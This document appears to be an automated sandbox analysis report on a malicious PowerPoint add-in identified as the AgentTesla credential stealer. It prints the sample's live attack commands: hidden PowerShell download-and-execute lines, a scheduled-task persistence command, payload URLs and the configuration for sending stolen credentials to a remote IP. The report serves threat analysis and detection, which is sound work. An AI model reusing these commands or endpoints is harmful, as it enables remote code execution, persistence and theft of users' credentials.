Windows Analysis Report 3.ppam

Overview

General Information

Sample Name: 3.ppam
Analysis ID: 553159
MD5: df075573f3546a582d5f4c690a469d9d
SHA1: 60c1884b11d4eb05f687e077adadcd749b7a488d
SHA256: 4337ff8e652f6fe6b0a8d0a01a67c23764a3bf31eb9ae5fca8826f246d1de2ed
Tags: ppam

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Creates an autostart registry key pointing to binary in C:\Windows
Document contains an embedded VBA macro which may execute processes
Writes to foreign memory regions
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses known network protocols on non-standard ports
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Connects to a URL shortener service
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • POWERPNT.EXE (PID: 5140 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
  • cmd.exe (PID: 4964 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\3.ppam" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • POWERPNT.EXE (PID: 5720 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou " MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
      • powershell.exe (PID: 6628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6028 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 15FF7D8324231381BAD48A052F85DF04)
        • aspnet_compiler.exe (PID: 1200 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
        • aspnet_compiler.exe (PID: 6068 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
        • aspnet_compiler.exe (PID: 5156 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
  • powershell.exe (PID: 3660 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6240 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 3860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6656 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • powershell.exe (PID: 1284 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6288 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: aspnet_compiler.exe PID: 6068 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: aspnet_compiler.exe PID: 6068 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

          Sigma Overview

          System Summary:

          Sigma detected: Change PowerShell Policies to a Unsecure Level
          Source: Process started, Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
          Sigma detected: Microsoft Office Product Spawning Windows Shell
          Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
          Sigma detected: Suspicious aspnet_compiler.exe Execution
          Source: Process started, Author: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, ProcessId: 1200
          Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
          Source: Process started, Author: James Pemberton / @4A616D6573: Data: Command: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, ProcessId: 6028
          Sigma detected: Non Interactive PowerShell
          Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
          Sigma detected: T1086 PowerShell Execution
          Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132866651880071197.6628.DefaultAppDomain.powershell

          Persistence and Installation Behavior:

          Sigma detected: Schedule system process
          Source: Process started, Author: Joe Security: Data: Command: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, ProcessId: 6028

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 31.0.aspnet_compiler.exe.400000.4.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
          Multi AV Scanner detection for submitted file
          Source: 3.ppam, ReversingLabs: Detection: 25%
          Antivirus detection for URL or domain
          Source: https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt, Avira URL Cloud: Label: malware
          Source: 31.0.aspnet_compiler.exe.400000.4.unpack, Avira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.1.unpack, Avira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.3.unpack, Avira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.2.aspnet_compiler.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.2.unpack, Avira: Label: TR/Dropper.MSIL.Gen2
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

          Software Vulnerabilities:

          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Source: global traffic, DNS query: name: www.j.mp
          Source: global traffic, TCP traffic: 192.168.2.3:49776 -> 67.199.248.17:80
          Source: global traffic, TCP traffic: 192.168.2.3:49780 -> 104.16.202.237:443
          Source: powerpnt.exe, Memory has grown: Private usage: 0MB later: 49MB

          Networking:

          Uses known network protocols on non-standard ports
          Source: unknown, Network traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknown, Network traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknown, Network traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknown, Network traffic detected: HTTP traffic on port 8081 -> 49839
          Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox View, IP Address: 104.16.202.237
          Source: unknown, HTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49780 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49784 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49825 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49824 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.3:49827 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 34.102.176.152:443 -> 192.168.2.3:49828 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49829 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49834 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49835 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49836 version: TLS 1.0
          Source: global traffic, HTTP traffic detected: GET /file/nm9ysba5ejf20r8/6.dll/file HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: www.mediafire.com | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /rm83e8erdqxg/nm9ysba5ejf20r8/6.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: download2262.mediafire.com | Cookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4 | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /atom.xml HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: p6tbbb.blogspot.com | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /atom.xml HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: p26ynn.blogspot.com | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: www.mediafire.com | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /u45xa78x9nkg/5avuvurhf9r42y3/6.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: download2262.mediafire.com | Cookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0 | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /1rxjqgtrygkg/5avuvurhf9r42y3/6.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: download2262.mediafire.com | Cookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7l | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: www.j.mp | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: bit.ly | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: 207.32.217.137:8081 | Content-Length: 282 | Expect: 100-continue | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: 207.32.217.137:8081 | Content-Length: 282 | Expect: 100-continue
          Source: global traffic, HTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: 207.32.217.137:8081 | Content-Length: 284 | Expect: 100-continue
          Source: global traffic HTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
            Content-Type: application/x-www-form-urlencoded
            Host: 207.32.217.137:8081
            Content-Length: 286
            Expect: 100-continue
          Source: global traffic TCP traffic: 192.168.2.3:49838 -> 207.32.217.137:8081
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DNS query: name: bit.ly
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknown TCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.595879670.0000000003656000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.595907029.000000000365C000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.596041757.0000000003682000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.595740683.0000000003616000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.596016049.000000000367C000.00000004.00000001.sdmp String found in binary or memory: http://207.32.217.137:8081
          Source: aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmp String found in binary or memory: http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp String found in binary or memory: http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php127.0.0.1POST
          Source: aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmp String found in binary or memory: http://207.32.217.137:8081x&bq(
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
          Source: powershell.exe, 00000009.00000003.439483143.0000000002CC6000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp String found in binary or memory: http://kVEmyA.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: ~DF85570804A0D29ED2.TMP.7.dr String found in binary or memory: http://www.j.mp/asao
          Source: ~DF1369462A1EE99835.TMP.7.dr, notnice.ps1.7.dr, vbaProject.bin String found in binary or memory: http://www.j.mp/asasdjiasjdiasjasdasddik
          Source: PowerShell_transcript.651689.x22XD8Wy.20220114122042.txt.22.dr, String found in binary or memory: https://p26ynn.blogspot.com/atom.xml
          Source: PowerShell_transcript.651689.TDo_fU7j.20220114122054.txt.27.dr, String found in binary or memory: https://p6tbbb.blogspot.com/atom.xml
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknown, HTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Content-Type: application/x-www-form-urlencoded Host: 207.32.217.137:8081 Content-Length: 282 Expect: 100-continue Connection: Keep-Alive
          Source: unknown, DNS traffic detected: queries for: www.j.mp
          Source: global traffic, HTTP traffic detected: GET /file/nm9ysba5ejf20r8/6.dll/file HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: www.mediafire.com Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /rm83e8erdqxg/nm9ysba5ejf20r8/6.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: download2262.mediafire.com Cookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4 Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /atom.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: p6tbbb.blogspot.com Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /atom.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: p26ynn.blogspot.com Connection: Keep-Alive
